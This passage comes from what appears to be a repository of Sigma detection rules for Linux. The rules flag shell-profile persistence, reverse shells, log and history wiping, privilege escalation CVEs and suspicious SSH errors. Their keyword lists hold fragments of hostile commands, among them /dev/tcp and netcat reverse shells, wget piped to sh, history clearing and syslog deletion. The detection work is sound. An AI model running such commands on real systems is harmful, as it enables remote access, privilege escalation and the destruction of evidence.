6 | status: experimental 7 | description: Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened. 8 | references: 9 | - https://objective-see.org/blog/blog_0x68.html 10 | - https://www.glitch-cat.com/p/green-lambert-and-attack 11 | - https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat 12 | author: Peter Matkovski, IAI 13 | date: 2023/03/06 14 | modified: 2023/03/15 15 | tags: 16 | - attack.persistence 17 | - attack.t1546.004 18 | logsource: 19 | product: linux 20 | service: auditd 21 | detection: 22 | selection: 23 | type: 'PATH' 24 | name: 25 | - '/etc/shells' 26 | - '/etc/profile' 27 | - '/etc/profile.d/*' 28 | - '/etc/bash.bashrc' 29 | - '/etc/bashrc' 30 | - '/etc/zsh/zprofile' 31 | - '/etc/zsh/zshrc' 32 | - '/etc/zsh/zlogin' 33 | - '/etc/zsh/zlogout' 34 | - '/etc/csh.cshrc' 35 | - '/etc/csh.login' 36 | - '/root/.bashrc' 37 | - '/root/.bash_profile' 38 | - '/root/.profile' 39 | - '/root/.zshrc' 40 | - '/root/.zprofile' 41 | - '/home/*/.bashrc' 42 | - '/home/*/.zshrc' 43 | - '/home/*/.bash_profile' 44 | - '/home/*/.zprofile' 45 | - '/home/*/.profile' 46 | - '/home/*/.bash_login' 47 | - '/home/*/.bash_logout' 48 | - '/home/*/.zlogin' 49 | - '/home/*/.zlogout' 50 | condition: selection 51 | falsepositives: 52 | - Admin or User activity are expected to generate some false positives 53 | level: medium 54 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml: -------------------------------------------------------------------------------- 1 | title: Steganography Unzip Hidden Information From Picture File 2 | id: edd595d7-7895-4fa7-acb3-85a18a8772ca 3 | status: test 4 | description: Detects extracting of zip file from image file 5 | references: 6 | - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ 7 | author: 'Pawel Mazur' 8 | date: 2021/09/09 9 | modified: 2022/10/09 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1027.003 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | commands: 18 | type: EXECVE 19 | a0: unzip 20 | a1: 21 | a1|endswith: 22 | - '.jpg' 23 | - '.png' 24 | condition: commands and a1 25 | falsepositives: 26 | - Unknown 27 | level: low 28 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_user_discovery.yml: -------------------------------------------------------------------------------- 1 | title: System Owner or User Discovery 2 | id: 9a0d8ca0-2385-4020-b6c6-cb6153ca56f3 3 | status: test 4 | description: Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md 7 | author: Timur Zinniatullin, oscd.community 8 | date: 2019/10/21 9 | modified: 2021/11/27 10 | tags: 11 | - attack.discovery 12 | - attack.t1033 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: 'EXECVE' 19 | a0: 20 | - 'users' 21 | - 'w' 22 | - 'who' 23 | condition: selection 24 | falsepositives: 25 | - Admin activity 26 | level: low 27 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_web_rce.yml: -------------------------------------------------------------------------------- 1 | title: Webshell Remote Command Execution 2 | id: c0d3734d-330f-4a03-aae2-65dacc6a8222 3 | status: test 4 | description: Detects possible command execution by web application/web shell 5 | references: 6 | - Personal Experience of the Author 7 | author: Ilyas Ochkov, Beyu Denis, oscd.community 8 | date: 2019/10/12 9 | modified: 2022/12/25 10 | tags: 11 | - attack.persistence 12 | - attack.t1505.003 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | # You need to add to the following rules to your auditd.conf config: 19 | # -a always,exit -F arch=b32 -S execve -F euid=33 -k detect_execve_www 20 | # -a always,exit -F arch=b64 -S execve -F euid=33 -k detect_execve_www 21 | # Change the number "33" to the ID of your WebServer user. Default: www-data:x:33:33 22 | type: 'SYSCALL' 23 | syscall: 'execve' 24 | key: 'detect_execve_www' 25 | condition: selection 26 | falsepositives: 27 | - Admin activity 28 | - Crazy web applications 29 | level: critical 30 | -------------------------------------------------------------------------------- /rules/linux/builtin/auth/lnx_auth_pwnkit_local_privilege_escalation.yml: -------------------------------------------------------------------------------- 1 | title: PwnKit Local Privilege Escalation 2 | id: 0506a799-698b-43b4-85a1-ac4c84c720e9 3 | status: experimental 4 | description: Detects potential PwnKit exploitation CVE-2021-4034 in auth logs 5 | references: 6 | - https://twitter.com/wdormann/status/1486161836961579020 7 | author: Sreeman 8 | date: 2022/01/26 9 | modified: 2023/01/23 10 | tags: 11 | - attack.privilege_escalation 12 | - attack.t1548.001 13 | logsource: 14 | product: linux 15 | service: auth 16 | detection: 17 | keywords: 18 | '|all': 19 | - 'pkexec' 20 | - 'The value for environment variable XAUTHORITY contains suscipious content' 21 | - '[USER=root] [TTY=/dev/pts/0]' 22 | condition: keywords 23 | falsepositives: 24 | - Unknown 25 | level: high 26 | -------------------------------------------------------------------------------- /rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml: -------------------------------------------------------------------------------- 1 | title: Relevant ClamAV Message 2 | id: 36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb 3 | status: stable 4 | description: Detects relevant ClamAV messages 5 | references: 6 | - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml 7 | author: Florian Roth (Nextron Systems) 8 | date: 2017/03/01 9 | tags: 10 | - attack.resource_development 11 | - attack.t1588.001 12 | logsource: 13 | product: linux 14 | service: clamav 15 | detection: 16 | keywords: 17 | - 'Trojan*FOUND' 18 | - 'VirTool*FOUND' 19 | - 'Webshell*FOUND' 20 | - 'Rootkit*FOUND' 21 | - 'Htran*FOUND' 22 | condition: keywords 23 | falsepositives: 24 | - Unknown 25 | level: high 26 | -------------------------------------------------------------------------------- /rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml: -------------------------------------------------------------------------------- 1 | title: Modifying Crontab 2 | id: af202fd3-7bff-4212-a25a-fb34606cfcbe 3 | status: test 4 | description: Detects suspicious modification of crontab file. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md 7 | author: Pawel Mazur 8 | date: 2022/04/16 9 | tags: 10 | - attack.persistence 11 | - attack.t1053.003 12 | logsource: 13 | product: linux 14 | service: cron 15 | detection: 16 | keywords: 17 | - 'REPLACE' 18 | condition: keywords 19 | falsepositives: 20 | - Legitimate modification of crontab 21 | level: medium 22 | -------------------------------------------------------------------------------- /rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml: -------------------------------------------------------------------------------- 1 | title: Guacamole Two Users Sharing Session Anomaly 2 | id: 1edd77db-0669-4fef-9598-165bda82826d 3 | status: test 4 | description: Detects suspicious session with two users present 5 | references: 6 | - https://research.checkpoint.com/2020/apache-guacamole-rce/ 7 | author: Florian Roth (Nextron Systems) 8 | date: 2020/07/03 9 | modified: 2021/11/27 10 | tags: 11 | - attack.credential_access 12 | - attack.t1212 13 | logsource: 14 | product: linux 15 | service: guacamole 16 | detection: 17 | selection: 18 | - '(2 users now present)' 19 | condition: selection 20 | falsepositives: 21 | - Unknown 22 | level: high 23 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_buffer_overflows.yml: -------------------------------------------------------------------------------- 1 | title: Buffer Overflow Attempts 2 | id: 18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781 3 | status: stable 4 | description: Detects buffer overflow attempts in Unix system log files 5 | references: 6 | - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml 7 | author: Florian Roth (Nextron Systems) 8 | date: 2017/03/01 9 | tags: 10 | - attack.t1068 11 | - attack.privilege_escalation 12 | logsource: 13 | product: linux 14 | detection: 15 | keywords: 16 | - 'attempt to execute code on stack by' 17 | - 'FTP LOGIN FROM .* 0bin0sh' 18 | - 'rpc.statd[\d+]: gethostbyname error for' 19 | - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' 20 | condition: keywords 21 | falsepositives: 22 | - Unknown 23 | level: high 24 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_clear_syslog.yml: -------------------------------------------------------------------------------- 1 | title: Commands to Clear or Remove the Syslog - Builtin 2 | id: e09eb557-96d2-4de9-ba2d-30f712a5afd3 3 | status: test 4 | description: Detects specific commands commonly used to remove or empty the syslog 5 | references: 6 | - https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474 7 | author: Max Altgelt (Nextron Systems) 8 | date: 2021/09/10 9 | modified: 2022/11/26 10 | tags: 11 | - attack.impact 12 | - attack.t1565.001 13 | logsource: 14 | product: linux 15 | detection: 16 | selection: 17 | - 'rm /var/log/syslog' 18 | - 'rm -r /var/log/syslog' 19 | - 'rm -f /var/log/syslog' 20 | - 'rm -rf /var/log/syslog' 21 | - 'mv /var/log/syslog' 22 | - ' >/var/log/syslog' 23 | - ' > /var/log/syslog' 24 | falsepositives: 25 | - '/syslog.' 26 | condition: selection and not falsepositives 27 | falsepositives: 28 | - Log rotation 29 | level: high 30 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_file_copy.yml: -------------------------------------------------------------------------------- 1 | title: Remote File Copy 2 | id: 7a14080d-a048-4de8-ae58-604ce58a795b 3 | status: stable 4 | description: Detects the use of tools that copy files from or to remote systems 5 | references: 6 | - https://attack.mitre.org/techniques/T1105/ 7 | author: Ömer Günal 8 | date: 2020/06/18 9 | tags: 10 | - attack.command_and_control 11 | - attack.lateral_movement 12 | - attack.t1105 13 | logsource: 14 | product: linux 15 | detection: 16 | tools: 17 | - 'scp ' 18 | - 'rsync ' 19 | - 'sftp ' 20 | filter: 21 | - '@' 22 | - ':' 23 | condition: tools and filter 24 | falsepositives: 25 | - Legitimate administration activities 26 | level: low 27 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_ldso_preload_injection.yml: -------------------------------------------------------------------------------- 1 | title: Code Injection by ld.so Preload 2 | id: 7e3c4651-c347-40c4-b1d4-d48590fdf684 3 | status: test 4 | description: Detects the ld.so preload persistence file. See `man ld.so` for more information. 5 | references: 6 | - https://man7.org/linux/man-pages/man8/ld.so.8.html 7 | author: Christian Burkard (Nextron Systems) 8 | date: 2021/05/05 9 | modified: 2022/10/09 10 | tags: 11 | - attack.persistence 12 | - attack.privilege_escalation 13 | - attack.t1574.006 14 | logsource: 15 | product: linux 16 | detection: 17 | keywords: 18 | - '/etc/ld.so.preload' 19 | condition: keywords 20 | falsepositives: 21 | - Rare temporary workaround for library misconfiguration 22 | level: high 23 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml: -------------------------------------------------------------------------------- 1 | title: Nimbuspwn Exploitation 2 | id: 7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8 3 | status: experimental 4 | description: Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800) 5 | references: 6 | - https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ 7 | - https://github.com/Immersive-Labs-Sec/nimbuspwn 8 | author: Bhabesh Raj 9 | date: 2022/05/04 10 | modified: 2023/01/23 11 | tags: 12 | - attack.privilege_escalation 13 | - attack.t1068 14 | logsource: 15 | product: linux 16 | detection: 17 | keywords: 18 | '|all': 19 | - 'networkd-dispatcher' 20 | - 'Error handling notification for interface' 21 | - '../../' 22 | condition: keywords 23 | falsepositives: 24 | - Unknown 25 | level: high 26 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml: -------------------------------------------------------------------------------- 1 | title: Potential Suspicious BPF Activity - Linux 2 | id: 0fadd880-6af3-4610-b1e5-008dc3a11b8a 3 | status: experimental 4 | description: Detects the presence of "bpf_probe_write_user" BPF helper-generated warning messages. Which could be a sign of suspicious eBPF activity on the system. 5 | references: 6 | - https://redcanary.com/blog/ebpf-malware/ 7 | - https://man7.org/linux/man-pages/man7/bpf-helpers.7.html 8 | author: Red Canary (idea), Nasreddine Bencherchali 9 | date: 2023/01/25 10 | tags: 11 | - attack.persistence 12 | - attack.defense_evasion 13 | logsource: 14 | product: linux 15 | detection: 16 | selection: 17 | - 'bpf_probe_write_user' 18 | condition: selection 19 | falsepositives: 20 | - Unknown 21 | level: high 22 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_privileged_user_creation.yml: -------------------------------------------------------------------------------- 1 | title: Privileged User Has Been Created 2 | id: 0ac15ec3-d24f-4246-aa2a-3077bb1cf90e 3 | status: test 4 | description: Detects the addition of a new user to a privileged group such as "root" or "sudo" 5 | references: 6 | - https://digital.nhs.uk/cyber-alerts/2018/cc-2825 7 | - https://linux.die.net/man/8/useradd 8 | - https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid 9 | author: Pawel Mazur 10 | date: 2022/12/21 11 | tags: 12 | - attack.persistence 13 | - attack.t1136.001 14 | - attack.t1098 15 | logsource: 16 | product: linux 17 | definition: '/var/log/secure on REHL systems or /var/log/auth.log on debian like Systems needs to be collected in order for this detection to work' 18 | detection: 19 | # Example of the events that could be observed when matching these would be as follow 20 | # Dec 21 16:42:19 testserver useradd[1337]: new user: name=butter1, UID=1000, GID=0, home=/root, shell=/bin/bash 21 | # Dec 21 17:13:54 testserver useradd[1337]: new user: name=john, UID=0, GID=0, home=/home/john, shell=/bin/bash 22 | # Dec 21 17:24:40 testserver useradd[1337]: new user: name=butter3, UID=1000, GID=10, home=/home/butter3, shell=/bin/bash 23 | # Dec 21 17:30:22 testserver useradd[1337]: new user: name=butter4, UID=1000, GID=27, home=/home/butter4, shell=/bin/bash 24 | selection_new_user: 25 | - 'new user' 26 | selection_uids_gids: 27 | - 'GID=0' # root group 28 | - 'UID=0' # root UID 29 | - 'GID=10' # wheel group 30 | - 'GID=27' # sudo group 31 | condition: all of selection_* 32 | falsepositives: 33 | - Administrative activity 34 | level: high 35 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_shell_clear_cmd_history.yml: -------------------------------------------------------------------------------- 1 | title: Clear Command History 2 | id: fdc88d25-96fb-4b7c-9633-c0e417fdbd4e 3 | status: test 4 | description: Clear command history in linux which is used for defense evasion. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md 7 | - https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics 8 | author: Patrick Bareiss 9 | date: 2019/03/24 10 | modified: 2022/12/25 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1070.003 14 | # Example config for this one (place it in .bash_profile): 15 | # (is_empty=false; inotifywait -m .bash_history | while read file; do if [ $(wc -l <.bash_history) -lt 1 ]; then if [ "$is_empty" = false ]; then logger -i -p local5.info -t empty_bash_history "$USER : ~/.bash_history is empty "; is_empty=true; fi; else is_empty=false; fi; done ) & 16 | # It monitors the size of .bash_history and log the words "empty_bash_history" whenever a previously not empty bash_history becomes empty 17 | # We define an empty file as a document with 0 or 1 lines (it can be a line with only one space character for example) 18 | # It has two advantages over the version suggested by Patrick Bareiss : 19 | # - it is not relative to the exact command used to clear .bash_history : for instance Caldera uses "> .bash_history" to clear the history and this is not one the commands listed here. We can't be exhaustive for all the possibilities ! 20 | # - the method suggested by Patrick Bareiss logs all the commands entered directly in a bash shell. therefore it may miss some events (for instance it doesn't log the commands launched from a Caldera agent). Here if .bash_history is cleared, it will always be detected 21 | logsource: 22 | product: linux 23 | detection: 24 | keywords: 25 | - 'rm *bash_history' 26 | - 'echo "" > *bash_history' 27 | - 'cat /dev/null > *bash_history' 28 | - 'cat /dev/zero > *bash_history' 29 | - 'ln -sf /dev/null *bash_history' 30 | - 'ln -sf /dev/zero *bash_history' 31 | - 'truncate -s0 *bash_history' 32 | # - 'unset HISTFILE' # prone to false positives 33 | - 'export HISTFILESIZE=0' 34 | - 'history -c' 35 | - 'history -w' 36 | - 'shred *bash_history' 37 | - 'empty_bash_history' 38 | - 'chattr +i *bash_history' 39 | condition: keywords 40 | falsepositives: 41 | - Unknown 42 | level: high 43 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_shell_susp_commands.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Activity in Shell Commands 2 | id: 2aa1440c-9ae9-4d92-84a7-a9e5f5e31695 3 | status: test 4 | description: Detects suspicious shell commands used in various exploit codes (see references) 5 | references: 6 | - https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html 7 | - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb 8 | - http://pastebin.com/FtygZ1cg 9 | - https://artkond.com/2017/03/23/pivoting-guide/ 10 | author: Florian Roth (Nextron Systems) 11 | date: 2017/08/21 12 | modified: 2021/11/27 13 | tags: 14 | - attack.execution 15 | - attack.t1059.004 16 | logsource: 17 | product: linux 18 | detection: 19 | keywords: 20 | # Generic suspicious commands 21 | - 'wget * - http* | perl' 22 | - 'wget * - http* | sh' 23 | - 'wget * - http* | bash' 24 | - 'python -m SimpleHTTPServer' 25 | - '-m http.server' # Python 3 26 | - 'import pty; pty.spawn*' 27 | - 'socat exec:*' 28 | - 'socat -O /tmp/*' 29 | - 'socat tcp-connect*' 30 | - '*echo binary >>*' 31 | # Malware 32 | - '*wget *; chmod +x*' 33 | - '*wget *; chmod 777 *' 34 | - '*cd /tmp || cd /var/run || cd /mnt*' 35 | # Apache Struts in-the-wild exploit codes 36 | - '*stop;service iptables stop;*' 37 | - '*stop;SuSEfirewall2 stop;*' 38 | - 'chmod 777 2020*' 39 | - '*>>/etc/rc.local' 40 | # Metasploit framework exploit codes 41 | - '*base64 -d /tmp/*' 42 | - '* | base64 -d *' 43 | - '*/chmod u+s *' 44 | - '*chmod +s /tmp/*' 45 | - '*chmod u+s /tmp/*' 46 | - '* /tmp/haxhax*' 47 | - '* /tmp/ns_sploit*' 48 | - 'nc -l -p *' 49 | - 'cp /bin/ksh *' 50 | - 'cp /bin/sh *' 51 | - '* /tmp/*.b64 *' 52 | - '*/tmp/ysocereal.jar*' 53 | - '*/tmp/x *' 54 | - '*; chmod +x /tmp/*' 55 | - '*;chmod +x /tmp/*' 56 | condition: keywords 57 | falsepositives: 58 | - Unknown 59 | level: high 60 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_shell_susp_log_entries.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Log Entries 2 | id: f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1 3 | status: test 4 | description: Detects suspicious log entries in Linux log files 5 | author: Florian Roth (Nextron Systems) 6 | date: 2017/03/25 7 | modified: 2021/11/27 8 | tags: 9 | - attack.impact 10 | logsource: 11 | product: linux 12 | detection: 13 | keywords: 14 | # Generic suspicious log lines 15 | - entered promiscuous mode 16 | # OSSEC https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml 17 | - Deactivating service 18 | - Oversized packet received from 19 | - imuxsock begins to drop messages 20 | condition: keywords 21 | falsepositives: 22 | - Unknown 23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_shell_susp_rev_shells.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Reverse Shell Command Line 2 | id: 738d9bcf-6999-4fdb-b4ac-3033037db8ab 3 | status: test 4 | description: Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell 5 | references: 6 | - https://alamot.github.io/reverse_shells/ 7 | author: Florian Roth (Nextron Systems) 8 | date: 2019/04/02 9 | modified: 2021/11/27 10 | tags: 11 | - attack.execution 12 | - attack.t1059.004 13 | logsource: 14 | product: linux 15 | detection: 16 | keywords: 17 | - 'BEGIN {s = "/inet/tcp/0/' 18 | - 'bash -i >& /dev/tcp/' 19 | - 'bash -i >& /dev/udp/' 20 | - 'sh -i >$ /dev/udp/' 21 | - 'sh -i >$ /dev/tcp/' 22 | - '&& while read line 0<&5; do' 23 | - '/bin/bash -c exec 5<>/dev/tcp/' 24 | - '/bin/bash -c exec 5<>/dev/udp/' 25 | - 'nc -e /bin/sh ' 26 | - '/bin/sh | nc' 27 | - 'rm -f backpipe; mknod /tmp/backpipe p && nc ' 28 | - ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))' 29 | - ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 30 | - '/bin/sh -i <&3 >&3 2>&3' 31 | - 'uname -a; w; id; /bin/bash -i' 32 | - '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};' 33 | - ';os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(''HISTFILE'',''/dev/null'');' 34 | - '.to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 35 | - ';while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print' 36 | - 'socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:' 37 | - 'rm -f /tmp/p; mknod /tmp/p p &&' 38 | - ' | /bin/bash | telnet ' 39 | - ',echo=0,raw tcp-listen:' 40 | - 'nc -lvvp ' 41 | - 'xterm -display 1' 42 | condition: keywords 43 | falsepositives: 44 | - Unknown 45 | level: high 46 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_shellshock.yml: -------------------------------------------------------------------------------- 1 | title: Shellshock Expression 2 | id: c67e0c98-4d39-46ee-8f6b-437ebf6b950e 3 | status: test 4 | description: Detects shellshock expressions in log files 5 | references: 6 | - https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf 7 | author: Florian Roth (Nextron Systems) 8 | date: 2017/03/14 9 | modified: 2022/10/09 10 | tags: 11 | - attack.persistence 12 | - attack.t1505.003 13 | logsource: 14 | product: linux 15 | detection: 16 | keywords: 17 | - '(){:;};' 18 | - '() {:;};' 19 | - '() { :;};' 20 | - '() { :; };' 21 | condition: keywords 22 | falsepositives: 23 | - Unknown 24 | level: high 25 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_space_after_filename_.yml: -------------------------------------------------------------------------------- 1 | title: Space After Filename 2 | id: 879c3015-c88b-4782-93d7-07adf92dbcb7 3 | status: test 4 | description: Detects space after filename 5 | references: 6 | - https://attack.mitre.org/techniques/T1064 7 | author: Ömer Günal 8 | date: 2020/06/17 9 | modified: 2021/11/27 10 | tags: 11 | - attack.execution 12 | logsource: 13 | product: linux 14 | detection: 15 | selection1: 16 | - 'echo "*" > * && chmod +x *' 17 | selection2: 18 | - 'mv * "* "' 19 | condition: all of selection* 20 | falsepositives: 21 | - Typos 22 | level: low 23 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_susp_dev_tcp.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Use of /dev/tcp 2 | id: 6cc5fceb-9a71-4c23-aeeb-963abe0b279c 3 | status: experimental 4 | description: Detects suspicious command with /dev/tcp 5 | references: 6 | - https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/ 7 | - https://book.hacktricks.xyz/shells/shells/linux 8 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan 9 | author: frack113 10 | date: 2021/12/10 11 | modified: 2023/01/06 12 | tags: 13 | - attack.reconnaissance 14 | logsource: 15 | product: linux 16 | detection: 17 | keywords: 18 | - 'cat /dev/tcp/' 20 | - 'echo >/dev/tcp/' 21 | - 'bash -i >& /dev/tcp/' 22 | - 'sh -i >& /dev/udp/' 23 | - '0<&196;exec 196<>/dev/tcp/' 24 | - 'exec 5<>/dev/tcp/' 25 | - '(sh)0>/dev/tcp/' 26 | - 'bash -c ''bash -i >& /dev/tcp/' 27 | - 'echo -e ''#!/bin/bash\nbash -i >& /dev/tcp/' 28 | condition: keywords 29 | falsepositives: 30 | - Unknown 31 | level: medium 32 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_susp_jexboss.yml: -------------------------------------------------------------------------------- 1 | title: JexBoss Command Sequence 2 | id: 8ec2c8b4-557a-4121-b87c-5dfb3a602fae 3 | status: test 4 | description: Detects suspicious command sequence that JexBoss 5 | references: 6 | - https://www.us-cert.gov/ncas/analysis-reports/AR18-312A 7 | author: Florian Roth (Nextron Systems) 8 | date: 2017/08/24 9 | modified: 2022/07/07 10 | tags: 11 | - attack.execution 12 | - attack.t1059.004 13 | logsource: 14 | product: linux 15 | detection: 16 | selection1: 17 | - 'bash -c /bin/bash' 18 | selection2: 19 | - '&/dev/tcp/' 20 | condition: all of selection* 21 | falsepositives: 22 | - Unknown 23 | level: high 24 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_symlink_etc_passwd.yml: -------------------------------------------------------------------------------- 1 | title: Symlink Etc Passwd 2 | id: c67fc22a-0be5-4b4f-aad5-2b32c4b69523 3 | status: test 4 | description: Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd 5 | references: 6 | - https://www.qualys.com/2021/05/04/21nails/21nails.txt 7 | author: Florian Roth (Nextron Systems) 8 | date: 2019/04/05 9 | modified: 2021/11/27 10 | tags: 11 | - attack.t1204.001 12 | - attack.execution 13 | logsource: 14 | product: linux 15 | detection: 16 | keywords: 17 | - 'ln -s -f /etc/passwd' 18 | - 'ln -s /etc/passwd' 19 | condition: keywords 20 | falsepositives: 21 | - Unknown 22 | level: high 23 | -------------------------------------------------------------------------------- /rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml: -------------------------------------------------------------------------------- 1 | title: SSHD Error Message CVE-2018-15473 2 | id: 4c9d903d-4939-4094-ade0-3cb748f4d7da 3 | status: test 4 | description: Detects exploitation attempt using public exploit code for CVE-2018-15473 5 | references: 6 | - https://github.com/Rhynorater/CVE-2018-15473-Exploit 7 | author: Florian Roth (Nextron Systems) 8 | date: 2017/08/24 9 | modified: 2021/11/27 10 | tags: 11 | - attack.reconnaissance 12 | - attack.t1589 13 | logsource: 14 | product: linux 15 | service: sshd 16 | detection: 17 | keywords: 18 | - 'error: buffer_get_ret: trying to get more bytes 1907 than in buffer 308 [preauth]' 19 | condition: keywords 20 | falsepositives: 21 | - Unknown 22 | level: medium 23 | -------------------------------------------------------------------------------- /rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious OpenSSH Daemon Error 2 | id: e76b413a-83d0-4b94-8e4c-85db4a5b8bdc 3 | status: test 4 | description: Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts 5 | references: 6 | - https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c 7 | - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml 8 | author: Florian Roth (Nextron Systems) 9 | date: 2017/06/30 10 | modified: 2021/11/27 11 | tags: 12 | - attack.initial_access 13 | - attack.t1190 14 | logsource: 15 | product: linux 16 | service: sshd 17 | detection: 18 | keywords: 19 | - 'unexpected internal error' 20 | - 'unknown or unsupported key type' 21 | - 'invalid certificate signing key' 22 | - 'invalid elliptic curve value' 23 | - 'incorrect signature' 24 | - 'error in libcrypto' 25 | - 'unexpected bytes remain after decoding' 26 | - 'fatal: buffer_get_string: bad string' 27 | - 'Local: crc32 compensation attack' 28 | - 'bad client public DH value' 29 | - 'Corrupted MAC on input' 30 | condition: keywords 31 | falsepositives: 32 | - Unknown 33 | level: medium 34 | -------------------------------------------------------------------------------- /rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml: -------------------------------------------------------------------------------- 1 | title: Sudo Privilege Escalation CVE-2019-14287 - Builtin 2 | id: 7fcc54cb-f27d-4684-84b7-436af096f858 3 | related: 4 | - id: f74107df-b6c6-4e80-bf00-4170b658162b 5 | type: derived 6 | status: test 7 | description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 8 | references: 9 | - https://www.openwall.com/lists/oss-security/2019/10/14/1 10 | - https://access.redhat.com/security/cve/cve-2019-14287 11 | - https://twitter.com/matthieugarin/status/1183970598210412546 12 | author: Florian Roth (Nextron Systems) 13 | date: 2019/10/15 14 | modified: 2022/11/26 15 | tags: 16 | - attack.privilege_escalation 17 | - attack.t1068 18 | - attack.t1548.003 19 | - cve.2019.14287 20 | logsource: 21 | product: linux 22 | service: sudo 23 | detection: 24 | selection_user: 25 | USER: 26 | - '#-*' 27 | - '#*4294967295' 28 | condition: selection_user 29 | falsepositives: 30 | - Unlikely 31 | level: critical 32 | -------------------------------------------------------------------------------- /rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml: -------------------------------------------------------------------------------- 1 | title: Disabling Security Tools - Builtin 2 | id: 49f5dfc1-f92e-4d34-96fa-feba3f6acf36 3 | related: 4 | - id: e3a8a052-111f-4606-9aee-f28ebeb76776 5 | type: derived 6 | status: test 7 | description: 